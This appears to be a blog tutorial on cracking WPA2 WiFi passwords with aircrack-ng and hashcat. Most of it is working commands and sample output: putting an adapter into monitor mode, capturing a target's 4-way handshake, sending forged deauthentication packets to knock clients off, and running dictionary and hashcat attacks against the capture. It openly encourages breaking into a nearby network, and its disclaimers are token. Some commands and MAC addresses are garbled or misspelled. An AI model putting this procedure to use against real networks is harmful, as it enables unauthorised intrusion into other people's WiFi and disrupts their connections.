In this guide, we are going to help you out how you can crack WiFi networks using two of the best wireless hacking tools that are secured by using a weak password. We will be detailing step-by-step on how you can hack WPA2 using aircrack-ng and hashcat, though it is not exhaustive. This is going to be enough information for the users to test their network security or break into one that is near.
The attack that has been outlined below is entirely passive and is impossible to detect provided that the password that has been cracked is not going to be used by you. To speed up the reconnaissance process an optional de-authentication attack can be used plus you can know more about it till the end of the guide
If somehow you have a little know-how regarding this process, then you do not need to know the descriptions just jump to the list of commands that have been used at the bottom.
Note: Do keep one thing in your mind that this tutorial is only for educational purposes and should not be used for any illegal activity and the author is not responsible for any kind of use.
The tools needed
- Make sure you are comfortable using the Linux command line.
- Make sure to either have Kali Linux or Kali NetHunter installed.
- Now make sure to have Aircrack-ng downloaded and installed.
- The last tool you need is hashcat.
- John The Ripper is a great alternative instead if hashcat stops working for you.
How to Crack WPA2 Passwords with Aircrack-ng and Hashcat (Tutorial)
Enable Monitor Mode in your WiFi Adapter
You need to begin with listing the wireless interactions that support monitor mode with:
Airmon-ng
If no interface is listed, then it means that your wireless card does not provide support to the monitor mode. We can assume that the name of wireless interface is wlan@ be sure to use the correct name if it differs from this, then we are going to place the interface in the monitor mode:
Airmon-ng start wlan@
After this, you need to run iwconfig. You shall now be able to see a new monitor mode listed like mon@ or wlan@.
Find your target
You need to start listening to the 802.11 Beacon frames that are broadcasted by the near wireless routers by using your monitor interface:
Airodump-ng mon@
You are going to see the following output:
CH 13 ][ Elapsed: 52 s ][ 2022–01–02 17:00
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests
14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8
14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0>
14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK securedyou
9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK securedyou
00:23:69:AD:AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK SecuredYou is the best
06:26:BB:75:ED:69 -84 232 0 0 1 54e. WPA2 CCMP PSK HH2
78:71:9C:99:67:D0 -82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2
9C:34:26:9F:2E:E8 -85 40 0 0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT
BC:EE:7B:8F:48:28 -85 119 10 0 1 54e WPA2 CCMP PSK root
EC:1A:59:36:AD:CA -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca
Now we are going to crack the password of a network by the name securedyou. You need to remember the BSSID MAC address as well as the channel (CH) number as it is displayed by Airodump-ng as we require both of them for the next step.
SEE ALSO: How to Hack WPA3 WiFi Network Passwords in 2022 (Tutorial).
How to Capture a 4-way Handshake in WiFi Networks
The WPA or WPA2 uses a 4-way handshake to authenticate devices to the network. You do not need to know what it means, but you need to capture one of these handshakes to crack the network password. Handshakes take place when a device connects with the network like when your neighbors come home we can capture this handshake by directing airmon-ng to monitor traffic on the target by using the channel as well as bssid values that came from the last command.
- replace -c and — bssid values with the values of your target network
- -w specifies the directory where we will save the packet capture
- airodump-ng -c 3 — bssid 9C:5C:8E:C9:AB: C0 -w . mon0
- CH 6 ][ Elapsed: 1 min ][ 2020–03–7 13:09:16 ]
- BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
- 9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK DELL
Once you have captured the handshake you need to see something like {WPA handshake: bc: d3: c9: ef : d2: 67 there is the top right of the screen, just right of the current time.
If you feel impatient and are comfortable with using the active attack, then you can force the devices to connect towards the target network to reconnect by sending malicious de-authentication packets towards them. This results in the capture of a 4-way handshake.
Once the handshake has been captured, you need to press ctrl-c to quit airodump-ng. You shall see a .cap file where you told airodump-ng to save the capture that is called -01.Cap. We are going to use this capture file to crack the network password. We are going to rename this file to reflect the network name that we are trying to crack:
Mv ./-01.cap securedyou.cap
SEE ALSO: How to Secure your WiFi Routers from being hacked.
The Real Fun: Cracking the WPA2 Pin
The last step is going to crack the password by using the captured handshake. If you have got access to a GPU, it is highly recommended to use the hashcat for password cracking. We have created a tool that makes the hashcat very easy to use known as the naïve-hashcat.
If you do not have access towards the GPU, then you can find many GPU cracking services that can be used like the GPUHASH.me or OnlineHashCrack. You can also use CPU cracking with the Aircrack-ng. However, if you want to save time and use most of your GPU then you should overclock your GPU to speed up the brute-forcing.
Keep in mind that both the ways below assume a weal user-generated password. Many of the WPA or WPA2 router comes with a string 12 character random passwords that most of the users leave unchanged. We recommend you to use the probable wordlists WPA length dictionary files if you want to crack any one of these passwords.
Using Naive-Hashcat to do the Magic
Before you crack the password by using the naïve-hashcat, you need to convert the .cap file to the equivalent hashcat file format .hccapx. This can be done very quickly by either uploading the .cap file to https://hashcat.net/cap2hccapx or by directly using cap2hccapx tool.
Then you need to download and run it in hashcat:
# downloadgit clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat
Download a wordlist or large dictionary file:
Passwords Wordlist for Cracking WPA2 WiFi Passwords
Hashcat mode for WPA/WPA2 which you need to set:
2500 is the hashcat hash mode for WPA/WPA2
HASH_FILE=securedyou.hccapx POT_FILE=securedyou.pot HASH_TYPE=2500 ./naive-hashcat.sh
SEE ALSO: 10 Best WiFi Hacking Tools for Kali Linux 2022 (Free Download).
The naïve-hashcat uses different attacks like rule, combination, mask and dictionary and can take almost 10 days to run against the mid-strength passwords. The cracked password is saved to hackme.pot thus you need to check this file periodically. Once the password has been cracked, you shall see something like this as the content of your POT_FILE:
e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:securedyouhacking
The last two filed that have been separated by: is the name of the network and the password respectively.
Using Aircrack-ng to perform Dictionary Attack
The aircraft-ng can also be used for dictionary attacks that are basic and run on your CPU. Before running the offense, you need a wordlist. We recommend you to use the infamous RockYou dictionary file.
Download RockYou Dictionary Wordlist File
Keep in mind that if the network password is not in the wordlist, then you shall not crack the password.
- # -a2 specifies WPA2, -b is the BSSID, -w is the word file
- aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap
You shall see a KEY FOUND message in the terminal that is followed by a plain text version of the network password if the password is cracked.
- Aircrack-ng 2.0
- [00:01:49] 111040 keys tested (102.73 k/s)
- KEY FOUND! [ SecuredYou-test-environment ]
- Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
- 59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
- Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
- 2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
- 6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
- 8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
- EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
SEE ALSO: 11 Best Live CD Security Linux Distros for Ethical Hacking and Penetration Testing.
Performing the De-authentication Attack
The de-authentication attack can send forged de-authentication packets from your machine towards the client connected to the network that you are trying to crack. The packages include fake sender addresses that appear to the client as if they were sent from the access point themselves. On the receipt of packages like these many clients likely to disconnect from the network and then reconnect immediately provided with a 4-way handshake if you are listening with airodump-ng.
You can use airodump-ng to monitor a specific access point (using –c channel –bssid MAC) unless and until you see a client (STATION) connected. A connected client looks almost like this, where is 64: BC: 0C: 48: 97: F7 the client MAC.
- CH 7 ][ Elapsed: 4 mins ][ 2020–03-08 20:24 ]
- BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
- 9C:5C:8E:C9:AB:C0 -19 75 1043 144 10 6 54e WPA2 CCMP PSK ASUS
- BSSID STATION PWR Rate Lost Frames Prob
- 9C:5C:8E:C9:AB:C0 64:BC:0C:48:97:F7 -37 1e- 1e 4 6479 Dell
Now you need to leave airodump-ng to run and open a new terminal. We are going to use an airplay-ng command to send fake de-auth packets towards the victim client, which forces it to reconnect with the network and grab a handshake in the process hopefully.
- -0 3 specifies we would like to send 3 deauth packets. Increase this number
- if need be with the risk of noticeably interrupting client network activity
- -a is the MAC of the access point
- -c is the MAC of the client
- aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:X0 -c 64:DC:3C:48:97:F7 mon0
You can also broadcast deauth packets to all connected clients in a wireless network using the below command:
- aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 mon0
SEE ALSO: Ethical Hacking Cheat Sheet for Professional Hackers.
As soon as you send the deauth packets, you need to go back to the airodump-ng process and if there is any luck you shall be able to see something like this there on the top right [ WPA handshake: 9C: 6C: 9E: D7: 8G: C0. Now, as the handshake has been captured, you are ready to crack the network password.
Video Version of the tutorial
If you are someone who learns by watching someone else doing it then below is a video version for you.
Hacking WPA2 Wireless Passwords using Aircrack-ng/Hashcat
Alternative wireless hacking tools you could use:
- Kismet Free Download – WiFi Sniffer
- Reaver WPS Pin Cracker Download
- 15 Best Free Hacking Tools and Security Tools to Download.
Last Words
Disclaimer: This is just a simulation of how someone can crack WPA2 passwords using tools like Hashcat and Aircrack-ng. This kind of activity should only be performed in a controlled environment where permission is given. However, I do hope you enjoyed this comprehensive tutorial and have made the most out of it.